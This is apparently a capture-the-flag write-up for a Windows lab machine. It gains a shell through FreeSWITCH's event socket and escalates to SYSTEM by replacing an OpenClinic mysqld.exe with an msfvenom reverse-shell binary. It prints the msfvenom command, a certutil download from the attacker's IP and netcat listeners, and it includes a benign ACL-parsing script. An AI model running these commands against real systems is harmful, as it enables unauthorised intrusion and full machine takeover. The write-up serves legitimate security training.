0x00 Recon

We first use rustscan to perform a port scan.

rustscan -a 10.10.251.223

.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.251.223:3389
Open 10.10.251.223:8021

Then we use nmap for a more detailed scan of the discovered ports.

sudo nmap -Pn -sC -sV -A -O 10.10.251.223 -p 3398,8021

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 10:06 EDT
Nmap scan report for 10.10.251.223
Host is up (0.33s latency).

PORT STATE SERVICE VERSION
3398/tcp filtered sapcomm
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

FreeSWITCH's mod_event_socket, exposed on port 8021, looks suspicious.
Detailed information about this vulnerability is available at
https://www.exploit-db.com/exploits/47799

0x01 RCE

We can use this Proof of Concept (PoC) to gain a shell:

└─$ python poc.py 10.10.251.223 "whoami"                       
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic

Afterwards, we can use revshells.com to generate a reverse shell script.
https://www.revshells.com/

python poc.py 10.10.251.223 "powershell -e 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"
Authenticated

└─$ rlwrap nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.8.92.150] from (UNKNOWN) [10.10.251.223] 49873
dir


Directory: C:\Program Files\FreeSWITCH


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:22 cert
d----- 09/11/2021 07:22 conf
d----- 24/06/2023 14:55 db
d----- 09/11/2021 07:18 fonts
d----- 09/11/2021 07:18 grammar
d----- 09/11/2021 07:18 htdocs
d----- 09/11/2021 07:18 images
d----- 09/11/2021 07:18 libmariadb_plugin
d----- 24/06/2023 14:55 log
d----- 09/11/2021 07:18 mod
d----- 09/11/2021 07:22 recordings
d----- 09/11/2021 07:22 run
d----- 09/11/2021 07:22 scripts
d----- 09/11/2021 07:18 sounds
d----- 09/11/2021 07:22 storage
-a---- 20/08/2019 13:08 4991488 FreeSwitch.dll
-a---- 20/08/2019 13:08 26624 FreeSwitchConsole.exe
-a---- 20/08/2019 13:19 62976 fs_cli.exe
-a---- 13/05/2019 07:13 293888 ks.dll
-a---- 20/08/2019 13:04 152064 libapr.dll
-a---- 20/08/2019 13:04 134656 libaprutil.dll
-a---- 20/08/2019 13:16 131584 libbroadvoice.dll
-a---- 21/03/2018 20:39 1805824 libeay32.dll
-a---- 23/03/2019 16:37 1050112 libmariadb.dll
-a---- 20/08/2019 13:06 190464 libpng16.dll
-a---- 05/04/2018 10:18 279552 libpq.dll
-a---- 04/04/2018 18:59 1288192 libsndfile-1.dll
-a---- 20/08/2019 13:05 1291776 libspandsp.dll
-a---- 20/08/2019 13:04 27648 libteletone.dll
-a---- 09/08/2018 12:42 283648 lua53.dll
-a---- 09/04/2018 13:36 66362368 opencv_world341.dll
-a---- 09/11/2021 07:18 825160 openh264.dll
-a---- 20/08/2019 13:02 4596 OPENH264_BINARY_LICENSE.txt
-a---- 03/04/2018 18:31 147456 pcre.dll
-a---- 20/08/2019 13:14 313856 pocketsphinx.dll
-a---- 20/08/2019 13:10 49152 pthread.dll
-a---- 13/05/2019 08:03 165888 signalwire_client.dll
-a---- 20/08/2019 13:14 366592 sphinxbase.dll
-a---- 21/03/2018 20:39 349184 ssleay32.dll
-a---- 24/03/2018 20:20 15766528 v8.dll
-a---- 24/03/2018 20:05 177152 v8_libbase.dll
-a---- 24/03/2018 20:19 134656 v8_libplatform.dll
-a---- 03/04/2018 15:01 126976 zlib.dll


PS C:\Program Files\FreeSWITCH>

We can find two flags in C:\Users\Nekrotic\Desktop.

PS C:\Users\Nekrotic\Desktop> ls


Directory: C:\Users\Nekrotic\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 09/11/2021 07:39 38 root.txt
-a---- 09/11/2021 07:39 38 user.txt

However, reading root.txt requires NT AUTHORITY\SYSTEM privileges, as its ACL shows:

PS C:\Users\Nekrotic\Desktop> Get-Acl root.txt | select *


PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Nekrotic\Desktop\root.txt
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Nekrotic\Desktop
PSChildName : root.txt
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
CentralAccessPolicyId :
CentralAccessPolicyName :
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Nekrotic\Desktop\root.txt
Owner : NT AUTHORITY\SYSTEM
Group : WIN-EOM4PK0578N\None
Access : {System.Security.AccessControl.FileSystemAccessRule}
Sddl : O:SYG:S-1-5-21-343416598-1122472384-1008025730-513D:PAI(A;;FA;;;SY)
AccessToString : NT AUTHORITY\SYSTEM Allow FullControl
AuditToString :
AccessRightType : System.Security.AccessControl.FileSystemRights
AccessRuleType : System.Security.AccessControl.FileSystemAccessRule
AuditRuleType : System.Security.AccessControl.FileSystemAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical : True


0x02 Privilege Escalation

After searching everywhere without finding a way up, we discovered the "projects" folder.

PS C:\projects> ls


Directory: C:\projects


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 openclinic

Within that folder, "openclinic" looks somewhat suspicious.
The details of its vulnerabilities are at https://www.exploit-db.com/exploits/50448

Let's first confirm what actions we can perform on mysqld.exe.

PS C:\projects> Get-Acl C:\projects\openclinic\mariadb\bin\mysqld.exe | select *


PSPath : Microsoft.PowerShell.Core\FileSystem::C:\projects\openclinic\mariadb\bin\mysqld.exe
PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\projects\openclinic\mariadb\bin
PSChildName : mysqld.exe
PSDrive : C
PSProvider : Microsoft.PowerShell.Core\FileSystem
CentralAccessPolicyId :
CentralAccessPolicyName :
Path : Microsoft.PowerShell.Core\FileSystem::C:\projects\openclinic\mariadb\bin\mysqld.exe
Owner : BUILTIN\Administrators
Group : WIN-EOM4PK0578N\None
Access : {System.Security.AccessControl.FileSystemAccessRule,
System.Security.AccessControl.FileSystemAccessRule,
System.Security.AccessControl.FileSystemAccessRule}
Sddl : O:BAG:S-1-5-21-343416598-1122472384-1008025730-513D:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
AccessToString : NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
AuditToString :
AccessRightType : System.Security.AccessControl.FileSystemRights
AccessRuleType : System.Security.AccessControl.FileSystemAccessRule
AuditRuleType : System.Security.AccessControl.FileSystemAuditRule
AreAccessRulesProtected : False
AreAuditRulesProtected : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical : True

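The ACL above is what decides what BUILTIN\Users may do with mysqld.exe. Here is an added Python helper (not from the writeup) that decodes the two SDDL strings Get-Acl printed on this page and reports whether a given trustee holds any write, delete or re-ACL right; the alias tables are a constructed subset covering only the SIDs and rights that appear here.

```python
import re

# Two-letter SID aliases used by the SDDL strings on this page (constructed subset of the Windows table)
TRUSTEES = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators", "BU": "BUILTIN\\Users"}
# Two-letter rights aliases; FILE_GENERIC_READ | FILE_GENERIC_EXECUTE == 0x1200A9, the Users entry on mysqld.exe
RIGHTS = {"FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
          "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000}
# WRITE_DATA, APPEND_DATA, WRITE_EA, WRITE_ATTRIBUTES, DELETE, WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE
WRITE_BITS = 0x2 | 0x4 | 0x10 | 0x100 | 0x10000 | 0x40000 | 0x80000 | 0x10000000 | 0x40000000
ACE_RE = re.compile(r"\(([^)]*)\)")

def parse_rights(field):
    """Rights are either a hex mask ('0x1200a9') or concatenated two-letter aliases ('FA')."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS[field[i:i + 2]]  # KeyError on an alias outside the table above
    return mask

def parse_sddl(sddl):
    """Decode owner, DACL control flags (P = protected from inheritance) and every ACE."""
    owner = re.search(r"O:([A-Z]{2}|S-[\d-]+)", sddl).group(1)
    dacl = sddl[sddl.index("D:") + 2:]
    flags = dacl.split("(", 1)[0]
    aces = []
    for ace in ACE_RE.findall(dacl):
        ace_type, ace_flags, rights, _obj, _inh_obj, sid = ace.split(";")
        aces.append({"type": ace_type, "inherited": "ID" in ace_flags,
                     "mask": parse_rights(rights), "trustee": TRUSTEES.get(sid, sid)})
    return {"owner": TRUSTEES.get(owner, owner), "protected": "P" in flags, "aces": aces}

def writable_by(sddl, alias):
    """True if an Allow ACE grants the trustee any bit that modifies, deletes or re-ACLs the file."""
    name = TRUSTEES.get(alias, alias)
    return any(a["type"] == "A" and a["trustee"] == name and a["mask"] & WRITE_BITS
               for a in parse_sddl(sddl)["aces"])

# The two descriptors Get-Acl printed on this page
ROOT_TXT = "O:SYG:S-1-5-21-343416598-1122472384-1008025730-513D:PAI(A;;FA;;;SY)"
MYSQLD = ("O:BAG:S-1-5-21-343416598-1122472384-1008025730-513D:AI"
          "(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)")

if __name__ == "__main__":
    for name, sddl in (("root.txt", ROOT_TXT), ("mysqld.exe", MYSQLD)):
        d = parse_sddl(sddl)
        print(f"{name}: owner={d['owner']} protected={d['protected']}")
        for a in d["aces"]:
            print(f"  {a['type']} {a['trustee']} 0x{a['mask']:X}" + (" (inherited)" if a["inherited"] else ""))
        print(f"  BUILTIN\\Users can modify the file: {writable_by(sddl, 'BU')}")
```

For mysqld.exe it reports that Users hold only ReadAndExecute on the file itself, so being able to rename and replace the binary comes from rights on the bin directory rather than from this file ACL; an audit of service binaries should therefore check the parent directory's ACL as well.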
It seems we can replace mysqld.exe with a fake one to obtain a reverse shell. Use msfvenom to generate a reverse-shell executable, then serve it with Python's HTTP server and start a listener:

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.92.150 LPORT=2222 -f exe -o mysqld.exe

python3 -m http.server 80

rlwrap nc -nvlp 2222
listening on [any] 2222 ...

After replacing mysqld.exe, we can proceed to restart the system.

Rename-Item -Path "C:\projects\openclinic\mariadb\bin\mysqld.exe" -NewName "mysqld2.exe"

certutil.exe -urlcache -f http://10.8.92.150/mysqld.exe mysqld.exe

Restart-Computer

nice~ we got nt authority\system, now we can read root.txt hehe~

rlwrap nc -nvlp 2222
listening on [any] 2222 ...
connect to [10.8.92.150] from (UNKNOWN) [10.10.154.60] 49670
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system


C:\Users\Nekrotic\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9

Directory of C:\Users\Nekrotic\Desktop

09/11/2021 08:39 <DIR> .
09/11/2021 08:39 <DIR> ..
09/11/2021 08:39 38 root.txt
09/11/2021 08:39 38 user.txt
2 File(s) 76 bytes
2 Dir(s) 50,272,202,752 bytes free

C:\Users\Nekrotic\Desktop>type root.txt
type root.txt
type root.txt
THM{}